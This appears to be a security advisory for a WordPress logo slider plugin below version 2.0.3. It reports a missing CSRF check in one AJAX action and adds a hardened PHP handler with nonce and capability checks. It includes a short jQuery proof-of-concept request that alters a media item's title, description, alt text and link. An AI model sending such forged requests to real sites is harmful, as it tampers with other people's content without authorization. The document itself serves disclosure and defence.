The plugin does not have a CSRF check in the lswss_save_attachment_data AJAX action, allowing attackers to make a logged-in high-privilege user change the title, description, alt text, and URL of arbitrary uploaded media.
```javascript
jQuery.post(ajaxurl, {
  action: "lswss_save_attachment_data",
  attachment_id: 564,
  form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20via%20CSRF&lswss_attachment_alt=Alt%20text&lswss_attachment_link="
})
```
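For comparison, a handler for the same action with the missing checks in place. This is an added example, not the plugin's own code or its actual fix; the function name, nonce action `lswss_save_attachment`, request field `nonce`, script handle `lswss-admin`, meta key `_lswss_attachment_link`, and the mapping of the description to `post_content` are assumptions.

```php
<?php
// Added example: hypothetical hardened handler, not the plugin's actual code.
// Assumed names: nonce action 'lswss_save_attachment', request field 'nonce',
// script handle 'lswss-admin', meta key '_lswss_attachment_link'.

// Admin side: mint a per-user nonce and expose it to the script that sends the request.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'lswss-admin', 'LswssExample', array(
        'nonce' => wp_create_nonce( 'lswss_save_attachment' ),
    ) );
} );

add_action( 'wp_ajax_lswss_save_attachment_data', 'example_lswss_save_attachment_data' );

function example_lswss_save_attachment_data() {
    // 1. CSRF: a cross-site request cannot know the nonce, so it stops here.
    if ( ! check_ajax_referer( 'lswss_save_attachment', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // 2. Authorization: a valid nonce does not imply rights on this attachment.
    $attachment_id = isset( $_POST['attachment_id'] ) ? absint( $_POST['attachment_id'] ) : 0;
    if ( ! $attachment_id
        || 'attachment' !== get_post_type( $attachment_id )
        || ! current_user_can( 'edit_post', $attachment_id ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed.' ), 403 );
    }

    // 3. Parse the serialized form string, then sanitize each field by type.
    $form = array();
    if ( isset( $_POST['form_data'] ) ) {
        wp_parse_str( wp_unslash( $_POST['form_data'] ), $form );
    }
    $title = sanitize_text_field( $form['lswss_attachment_title'] ?? '' );
    $desc  = wp_kses_post( $form['lswss_attachment_desc'] ?? '' );
    $alt   = sanitize_text_field( $form['lswss_attachment_alt'] ?? '' );
    $link  = esc_url_raw( $form['lswss_attachment_link'] ?? '' );

    // wp_update_post() and update_post_meta() expect slashed input.
    wp_update_post( wp_slash( array(
        'ID'           => $attachment_id,
        'post_title'   => $title,
        'post_content' => $desc,
    ) ) );
    update_post_meta( $attachment_id, '_wp_attachment_image_alt', wp_slash( $alt ) );
    update_post_meta( $attachment_id, '_lswss_attachment_link', wp_slash( $link ) );

    wp_send_json_success();
}
```

With this in place, the request shown above is rejected with a 403 because it carries no `nonce` field.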
| CPE | Name | Operator | Version |
|---|---|---|---|
| | logo-showcase-with-slick-slider | lt | 2.0.3 |